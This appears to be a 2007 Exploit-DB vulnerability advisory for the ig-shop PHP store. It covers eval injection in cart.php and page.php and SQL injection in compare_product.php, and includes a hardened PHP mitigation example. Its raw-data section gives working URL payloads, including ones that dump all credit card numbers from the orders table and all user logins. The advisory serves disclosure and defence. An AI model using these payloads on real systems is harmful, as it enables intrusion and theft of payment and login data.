Vendor: ig-shop
By: Michael Brooks
N/A
CVSS: MEDIUM
Title: Eval and SQL Injection
CWE: 20
Product Name: ig-shop
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

ig-shop Eval and SQL Injection Vulnerabilities

ig-shop suffers from two eval statements whose argument can be controlled by an attacker. They can be triggered through the following URLs:
- http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
- http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
There is also an SQL injection vulnerability in the compare_product.php script, reachable through the following URL:
- http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
The vendor's page is http://www.igeneric.co.uk/

Mitigation:

To mitigate these vulnerabilities, the vendor should ensure that user input is validated before it reaches eval statements or SQL queries; in practice, request parameters should never be used to build code for eval at all, and the action parameter should instead be matched against a fixed allowlist of handler functions. For the SQL injection, the id value should be validated as an integer and passed to the database through parameterized queries or prepared statements rather than concatenated into the query string. It is also recommended to keep the software up to date with the latest patches and security updates.
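The mitigation above, worked through as an added example that is not part of the advisory or of ig-shop's own code: the two vulnerable lines the advisory quotes, each paired with a hardened replacement. It assumes PHP 7+, an open mysqli connection in $mysqli, and hypothetical handler names cart_add, cart_remove and cart_checkout standing in for whatever cart_* functions ig-shop actually defines.

```php
<?php
// Added example (not ig-shop's code): the two lines the advisory quotes,
// each followed by a hardened replacement. Assumes PHP 7+, an open mysqli
// connection in $mysqli, and hypothetical handler names cart_add,
// cart_remove and cart_checkout standing in for ig-shop's real cart_* functions.

// 1. cart.php:  eval ("cart_$action();");
//    Whatever arrives in ?action= is compiled as PHP, so ";phpinfo();//" runs.
//    Fix: map the parameter onto a fixed allowlist and never build code from it.
const CART_ACTIONS = [
    'add'      => 'cart_add',
    'remove'   => 'cart_remove',
    'checkout' => 'cart_checkout',
];

function dispatch_cart(string $action): void
{
    if (!array_key_exists($action, CART_ACTIONS)) {
        http_response_code(400);
        exit('unknown action');
    }
    $handler = CART_ACTIONS[$action];
    $handler();                          // only a listed function can run
}

// 2. compare_product.php:  "... where product_id=".$HTTP_GET_VARS[id]
//    Numeric context with no quotes, so magic_quotes_gpc cannot help and
//    "1 union select 1" is appended verbatim. Fix: validate as an integer
//    and bind it as a parameter so it is never part of the SQL text.
function product_type(mysqli $mysqli, string $rawId): ?int
{
    if (!ctype_digit($rawId)) {
        http_response_code(400);
        exit('bad id');
    }
    $id = (int) $rawId;
    $stmt = $mysqli->prepare('select type_id from catalog_product where product_id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($typeId);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int) $typeId : null;
}

dispatch_cart($_GET['action'] ?? '');
var_dump(product_type($mysqli, $_GET['id'] ?? ''));
```

The integer check and the bound parameter are deliberately both present: either alone closes the hole, and keeping both means loosening one later does not reopen it.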

Exploit-DB raw data:

"If eval is the answer, then you are asking the wrong question."
--Unknown

ig-shop suffers from two evals that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");

http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserialize() function.

Dumps all logins:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users


SQL injection works regardless of magic_quotes_gpc.
http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks. 

vendor's page:http://www.igeneric.co.uk/

By Michael Brooks. 

# milw0rm.com [2007-01-05]